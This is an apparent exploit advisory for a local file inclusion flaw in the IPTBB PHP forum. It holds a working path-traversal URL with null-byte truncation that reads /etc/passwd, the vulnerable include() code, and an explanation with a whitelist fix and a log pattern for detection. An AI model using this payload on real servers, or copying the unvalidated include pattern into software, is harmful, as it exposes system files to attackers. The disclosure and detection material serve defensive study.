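____ _ _ _ ___ __ _ __ / ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _ | | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` | | |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| | \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, | ---------------------------------------------------------------------------|___/

Exploit found by sToRm

IPTBB is a free forum system built using PHP and MySQL.

Local File Inclusion

Local File Inclusion
--------------------

index.php?act=../../../../../../etc/passwd%00

function action($page){
    $page="main/".$page.".php";
    //Include the template maker
    //Get the settings
    $setting = array();
    $sql = mysql_query(" SELECT * FROM `iptbb_settings` ");
    while ( $row = mysql_fetch_array( $sql ) ){
        $setting["{$row['name']}"] = $row['value'];
    }
    require_once('tpl.class.php');
    $tpl = new template;
    $fileurl = 'templates/';
    $template = $setting['template'] . '/';
    include($page);
}

Why this works: action() prepends "main/" and appends ".php" to $page and passes the result straight to include() with no validation. If $page comes from the act request parameter, as the URL above indicates, the ../ sequences climb out of main/ and the %00 null byte cuts off the appended ".php" on PHP versions that still accept null bytes in file paths (PHP 5.3.4 and later reject them). The fix is to resolve act against a fixed list of known page names before building the path, rather than trying to filter characters out of it; requests carrying ../ or %00 in act are the pattern to look for in web server logs.

# milw0rm.com [2008-06-20]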